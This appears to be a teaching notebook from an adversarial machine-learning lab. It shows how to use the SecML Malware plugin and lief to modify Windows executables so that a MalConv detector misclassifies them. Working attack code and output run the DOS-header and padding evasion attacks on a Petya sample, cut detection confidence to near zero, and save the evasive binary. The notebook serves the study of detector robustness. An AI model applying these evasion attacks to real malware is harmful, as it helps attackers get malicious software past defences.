# Adversarial EXEmples: evasion attacks against Windows malware detectors

In this laboratory, you will learn how to use SecML to create adversarial examples against Windows malware detector implemented through machine learning techniques. To do so, we will use [SecML malware](https://github.com/pralab/secml_malware), a SecML plugin containing most of the strategies developed to evade detectors.

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](
https://colab.research.google.com/github/zangobot/teaching_material/blob/main/03-AdversarialEXEmples.ipynb)

In [None]:
try:
    import secml_malware
except ImportError:
    %pip install git+https://github.com/elastic/ember
    %pip install git+https://github.com/pralab/secml_malware

# The Windows PE file format
Before starting the explanations of attacks, we remind how Windows programs are stored as file, following the [Windows Portable Executable (PE)](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) file format.
There are tons of Python libraries for dissecting programs, one of the best is [lief](https://github.com/lief-project/LIEF).
The latter is also used inside `secml-malware` to perturb samples, as shown later on in this tutorial.
Opening an executable is straight-forward:

In [None]:
import lief

exe_path = 'assets/calc.exe'
exe_object: lief.PE = lief.parse(exe_path)
print(exe_object)

Now, the `exe_object` contains all the information of the loaded program.
We can look for all the components. For instance, here is how you can read the header metadata:

In [None]:
print('DOS Header')
print(exe_object.dos_header)

print('PE Header')
print(exe_object.header)

print('Optional Header')
print(exe_object.optional_header)

print('Sections')
for s in exe_object.sections:
    print(s.name, s.characteristics_lists)

This library is also very useful for manipulating the EXEs.
For instance, in few lines of code you can add sections to a program.

In [None]:
# Name your new section. Size constraint: up to 8 bytes at maximum!
new_section : lief.PE.Section = lief.PE.Section()
new_section.name = '.newsec'
new_section.content = [ord(i) for i in "This is my newly created section"]
new_section.characteristics = lief.PE.SECTION_CHARACTERISTICS.MEM_DISCARDABLE
exe_object.add_section(new_section)

# New section in place! Now we use lief to rebuild the binary.
builder = lief.PE.Builder(exe_object)
builder.build()
exe_object = lief.PE.parse(builder.get_build())
print('Sections')
for s in exe_object.sections:
    print(s.name, s.characteristics_lists)
builder.write('new_exe.file')

As you can see, the new section appeared as last one.
More information on how to use lief on the [documentation of the library](https://lief-project.github.io/doc/stable/index.html).

# Evasion of End-to-end Deep Neural Network for Malware Detection

In this tutorial, you will learn how to use this plugin to test the already implemented attacks against a PyTorch network of your choice.

In [1]:
import os
import magic
from secml.array import CArray

from secml_malware.models.malconv import MalConv
from secml_malware.models.c_classifier_end2end_malware import CClassifierEnd2EndMalware, End2EndModel

net = MalConv()
net = CClassifierEnd2EndMalware(net)
net.load_pretrained_model()

Firstly, we have created the network (MalConv) and it has been passed wrapped with a *CClassifierEnd2EndMalware* model class.
This object generalizes PyTorch end-to-end ML models.
Since MalConv is already coded inside the plugin, the weights are also stored, and they can be retrieved with the *load_pretrained_model* method.

If you wish to use diffierent weights, pass the path to the PyTorch *pth* file to that method.

In [2]:
from secml_malware.attack.whitebox.c_header_evasion import CHeaderEvasion

partial_dos = CHeaderEvasion(net, random_init=False, iterations=50, optimize_all_dos=False, threshold=0.5)

This is how an attack is created, no further action is needed.
The `random_init` parameter specifies if the bytes should be assigned with random values before beginning the optimization process, `iterations` sets the number of steps of the attack, `optimize_all_dos` sets if all the DOS header should be perturbed, or just the first 58 bytes, while `threshold` is the detection threshold used as a stopping condition.

If you want to see how much the network is deteriorated by the attack, set this parameter to 0, or it will stop as soon as the confidence decreases below such value.

In [3]:
folder = "secml_malware/data/malware_samples/test_folder"
X = []
y = []
file_names = []
for i, f in enumerate(os.listdir(folder)):
    path = os.path.join(folder, f)
    if 'petya' not in path:
        continue
    if "PE32" not in magic.from_file(path):
        continue
    with open(path, "rb") as file_handle:
        code = file_handle.read()
    x = End2EndModel.bytes_to_numpy(
        code, net.get_input_max_length(), 256, False
    )
    _, confidence = net.predict(CArray(x), True)

    if confidence[0, 1].item() < 0.5:
        continue

    print(f"> Added {f} with confidence {confidence[0,1].item()}")
    X.append(x)
    conf = confidence[1][0].item()
    y.append([1 - conf, conf])
    file_names.append(path)

> Added petya.file with confidence 0.9112271666526794


We load a simple dataset from the `malware_samples/test_folder` that you have filled with malware to test the attacks.
We discard all the samples that are not seen by the network.
The `CArray` class is the base object you will handle when dealing with vectors in this library.

In [4]:
for sample, label in zip(X, y):
    y_pred, adv_score, adv_ds, f_obj = partial_dos.run(CArray(sample), CArray(label[1]))
    print(partial_dos.confidences_)
    print(f_obj)

[0.9112271666526794, 0.06050172820687294]
0.06050172820687294


Inside the `adv_ds` object, you can find the adversarial example computed by the attack.
You can reconstruct the functioning example by using a specific function inside the plugin:

In [5]:
adv_x = adv_ds.X[0,:]
real_adv_x = partial_dos.create_real_sample_from_adv(file_names[0], adv_x)
print(len(real_adv_x))
real_x = End2EndModel.bytes_to_numpy(real_adv_x, net.get_input_max_length(), 256, False)
_, confidence = net.predict(CArray(real_x), True)
print(confidence[0,1].item())

806912
0.06050172820687294


... and you're done!
If you want to create a real sample (stored on disk), just have a look at the `create_real_sample_from_adv` of each attack. It accepts a third string argument that will be used as a destination file path for storing the adversarial example.

## Bonus: more attacks!
We used one attack, which is the Partial DOS one. But what if we want to use others?
Easy peasy task! Just open the [source code](https://github.com/pralab/secml_malware/tree/master/secml_malware/attack/whitebox) or the [documentation](https://secml-malware.readthedocs.io/en/docs/source/secml_malware.attack.whitebox.html) of the other white box attacks, and instantiate the one you like!
Let's use the [FGSM attack](https://arxiv.org/abs/1802.04528), for instance:

In [6]:
from secml_malware.attack.whitebox import CKreukEvasion

fgsm = CKreukEvasion(net, how_many_padding_bytes=2048, epsilon=1.0, iterations=5)
for i, (sample, label) in enumerate(zip(X, y)):
    y_pred, adv_score, adv_ds, f_obj = fgsm.run(CArray(sample), CArray(label[1]))
    print(fgsm.confidences_)
    print(f_obj)
    real_adv_x = fgsm.create_real_sample_from_adv(file_names[i], adv_ds.X[i, :])
    with open(file_names[i], 'rb') as f:
        print('Original length: ', len(f.read()))
    print('Adversarial sample length: ', len(real_adv_x))


[0.9112271666526794, 0.67103111743927, 0.0]
1.1346487553964835e-05
Original length:  806912
Adversarial sample length:  808960


... and you're done! Remember that this particular attack might take a while, depending on how many bytes the algorithm is tasked to edit (and also for the number of iterations).
In the meantime, **happy coding with SecML Malware!**